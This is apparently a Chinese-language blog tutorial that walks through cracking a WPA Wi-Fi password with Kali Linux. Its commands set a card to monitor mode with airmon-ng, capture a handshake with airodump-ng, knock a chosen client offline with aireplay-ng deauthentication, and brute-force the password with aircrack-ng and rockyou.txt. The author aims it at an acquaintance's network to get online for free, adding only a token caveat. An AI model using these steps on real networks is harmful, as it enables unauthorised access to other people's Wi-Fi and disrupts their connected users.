硬件:Mac/windows電腦,具有monitor模式的無線網卡
軟件:vmware fusion,kali鏡像(iso文件即可)
以下均為乾貨,如有問題也可自行谷歌、百度。
勸君更盡一杯酒,我出陽關無故人。。。
1.搭建kali虛擬機,網上很多教程。
2.把你的無線網卡插進物理機,並配置給kali虛擬機 (就問你是不是乾貨?)
3.在shell裡輸入airmon-ng查看下網卡信息:
4.輸入airmon-ng start wlan0開啟網卡監聽模式:
5.再次查看網卡信息,注意這裡一定是mon結尾,否則是你的網卡無monitor模式:
6.命令行輸入:airodump-ng wlan0mon (airodump-ng後接網卡名,去掃面周圍wifi的信息,ctrl+c停止),掃出來如下圖:
這裡解釋幾個參數:
BSSID:MAC地址。
PWR:信號強度,越小信號越強。
#Data:傳輸的數據。
CH:信號頻道,只有在一個頻道才可進行下一步操作。
ESSID:wifi的名稱,中文的可能會亂碼。
7.抓包:在shell中輸入 airodump-ng -c 6 --bssid C6:F1:28:14:F1:F9 -w/home wlan0mon
這裡我要破解的wifi是Nokia7(熟人比較好下手),所以頻道和mac地址就要選擇指定wifi的,另外home是指抓到報文後的報文名。
8.新建一個窗口 ,輸入aireplay-ng -0 0 -a mac地址 網卡名 ,這一步是為了方便觀察交互的過程,可以跳過。
9.當窗口右上角出現 WPA handshake時說明抓包成功,我們還可以看到以獲取的cap報文:
10.進入/usr/share/wordlists/路徑下降kali自帶的密碼字典rockyou.txt.gz進行解壓:gzip -d rockyou.txt.gz
11.在shell中輸入aircrack-ng -w /usr/share/wordlists/rockyou.txt home-01.cap,這個過程就是暴力破解了,成功後顯示密碼字符串:
12.愉快上網了,請叫我行走的wifi。但是這都是比較理想化的密碼,暴力破解需要運氣的成分,所以還是不要嘗試破解反爆破的密碼,畢竟太耗性能。另外,這種釣魚wifi玩玩就可以了,不要觸碰底線哦!
補充:
1.獲取包的前提首先是由用戶連接此wifi
2.我們抓取的包是新用戶連接此wifi的過程產生的流量,但是如果沒有新用戶怎麼辦?那麼就讓他斷開重連。可是憑啥人家斷開呢?所以這是需要我們主動發起攻擊讓其斷開網絡,這時候我們是一直抓包的,如果用戶有知覺他會重連的,那麼機會就來了。在第七步的抓包圖片下半部分有一個station參數,那裡顯示的是連接此wifi的用戶mac地址,記住其中一個並打開新的shell輸入:aireplay-ng -0 2 -a C6:F1:28:14:F1:F9 -c xx:xx:xx:xx:xx:xx wlan0mon,前邊是wifi的mac地址,後邊是被攻擊者的mac地址。aireplay-ng的工具,它可以強制用戶斷開wifi連接;原理是,給連接到wifi的一個設備發送一個deauth(反認證)包,讓那個設備斷開wifi,隨後它自然會再次連接wifi。當我們多次嘗試攻擊併成功後就會獲取報文,也就是說當窗口右上角出現 WPA handshake時說明抓包成功。於是我們就可以接著進行暴力破解了。
參數解釋:
- -0表示發起deauthentication攻擊
- -a指定無線路由器BSSID
- -c指定強制斷開的設備
閱讀更多 極意 的文章